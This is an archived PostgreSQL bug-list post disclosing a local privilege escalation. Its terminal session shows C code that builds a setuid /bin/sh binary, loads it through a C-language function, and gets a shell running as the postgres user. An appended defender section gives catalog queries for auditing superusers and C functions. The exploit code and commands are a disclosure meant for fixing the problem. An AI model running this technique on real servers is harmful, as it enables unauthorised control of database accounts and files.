"Bug" report - Serious (local shell) - Mailing list pgsql-bugs
From | Diego Linke - GAMK |
---|---|
Subject | "Bug" report - Serious (local shell) |
Date | |
Msg-id | 20030814150742.6457e853.linke@calnet.com.br |
Responses | Re: "Bug" report - Serious (local shell) |
 | Re: "Bug" report - Serious (local shell) |
List | pgsql-bugs |
============================================================================
                        POSTGRESQL BUG REPORT TEMPLATE
============================================================================

Your name          : Diego Linke
Your email address : gamk@gamk.com.br

System Configuration
---------------------
  Architecture (example: Intel Pentium)         : Intel
  Operating System (example: Linux 2.0.26 ELF)  : NetBSD 1.6.1_STABLE
  PostgreSQL version (example: PostgreSQL-7.3.2): PostgreSQL-7.3.2
  Compiler used (example: gcc 2.95.2)           : 2.95.3 20010315

Please enter a FULL description of your problem:
------------------------------------------------

The problem is that when PostgreSQL calls an external C function, it calls
it as the postgres user. A bad user will be able to create a binary with a
shell suid to the postgres user, and to assume control of postgres
(pg_hba.conf, databases, postmaster, in short everything that the postgres
user can do). I presume that this problem exists in all versions of
postgres. :p

See this example:

(work/ttyp2:/tmp/ja_era)> id
uid=1000(gamk) gid=100(users) groups=100(users),0(wheel),5(operator)
(work/ttyp2:/tmp/ja_era)> id pgsql
uid=1001(pgsql) gid=1000(pgsql) groups=1000(pgsql)
(work/ttyp2:/tmp/ja_era)> cat supg.c
main() {
    setuid(1001);
    setgid(1000);
    system("/bin/sh");
}
(work/ttyp2:/tmp/ja_era)> cat func.c
#include <stdlib.h>

int execute(int x) {
    system("gcc -o /tmp/ja_era/supg /tmp/ja_era/supg.c");
    system("chmod a+x /tmp/ja_era/supg");
    system("chmod u+s /tmp/ja_era/supg");
    return(x+1);
}
(work/ttyp2:/tmp/ja_era)> cc -c -fpic func.c
(work/ttyp2:/tmp/ja_era)> cc -o func.so -shared func.o
(work/ttyp2:/tmp/ja_era)> psql teste
Welcome to psql 7.3.2, the PostgreSQL interactive terminal.

Type:  \copyright for distribution terms
       \h for help with SQL commands
       \? for help on internal slash commands
       \g or terminate with semicolon to execute query
       \q to quit

teste=# CREATE FUNCTION execute (integer) RETURNS integer AS '/tmp/ja_era/func.so' LANGUAGE C;
CREATE FUNCTION
teste=# SELECT execute(5);
 execute
---------
       6
(1 row)

teste=# \q
(work/ttyp2:/tmp/ja_era)> ls -l supg
-rws--x--x  1 pgsql  wheel  6029 Aug 14 08:41 supg*
(work/ttyp2:/tmp/ja_era)> ./supg
$ whoami
pgsql
$ id
uid=1000(gamk) euid=1001(pgsql) gid=100(users) groups=100(users),0(wheel),5(operator)
$ touch /tmp/teste
$ ls -l /tmp/teste
-rw-r--r--  1 pgsql  wheel  0 Aug 14 08:42 /tmp/teste
$

--
[ Diego Linke - GAMK ]
System/Network/Security Administrator
E-Mail/Site: gamk@gamk.com.br - http://www.gamk.com.br
Public Key: http://www.gamk.com.br/gamk.asc
Phone Number: (+5541) 9967-3464
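As an added, defender-side example that is not part of this report and not code from the PostgreSQL project: the capability the report relies on is `CREATE FUNCTION ... LANGUAGE C`, which PostgreSQL grants only to superusers, so the useful administrative checks are who holds superuser and which functions already load external shared objects. The two catalog queries below are written for a current PostgreSQL release (`pg_roles` exists from 8.1 onward; on 7.3 the equivalent superuser flag is `pg_shadow.usesuper`); the column aliases are my own, and the exclusion of `pg_catalog` and `information_schema` is an assumption that built-in functions are not of interest.

```sql
-- 1. Who can create C-language functions at all: every superuser role.
--    (pg_roles exists from PostgreSQL 8.1; on 7.3 query pg_shadow.usesuper)
SELECT rolname, rolcanlogin
FROM   pg_roles
WHERE  rolsuper;

-- 2. Every user-defined function written in an untrusted language
--    (C, internal, plpythonu, ...) and, for C functions, the shared
--    object it loads (probin) and the symbol it calls (prosrc).
--    A probin outside the server's $libdir is what to look for.
SELECT n.nspname                    AS schema_name,
       p.proname                    AS function_name,
       l.lanname                    AS language,
       p.probin                     AS shared_object,
       p.prosrc                     AS symbol,
       pg_get_userbyid(p.proowner)  AS owner
FROM   pg_proc      p
JOIN   pg_language  l ON l.oid = p.prolang
JOIN   pg_namespace n ON n.oid = p.pronamespace
WHERE  NOT l.lanpltrusted                        -- untrusted languages only
  AND  n.nspname NOT IN ('pg_catalog', 'information_schema')
ORDER  BY schema_name, function_name;
```

Run both as a superuser during a routine review: the first query is the real control (a role that is not a superuser cannot define the function shown in the report at all), and the second turns an existing `probin` such as `/tmp/ja_era/func.so` into a visible finding rather than something discovered after the fact.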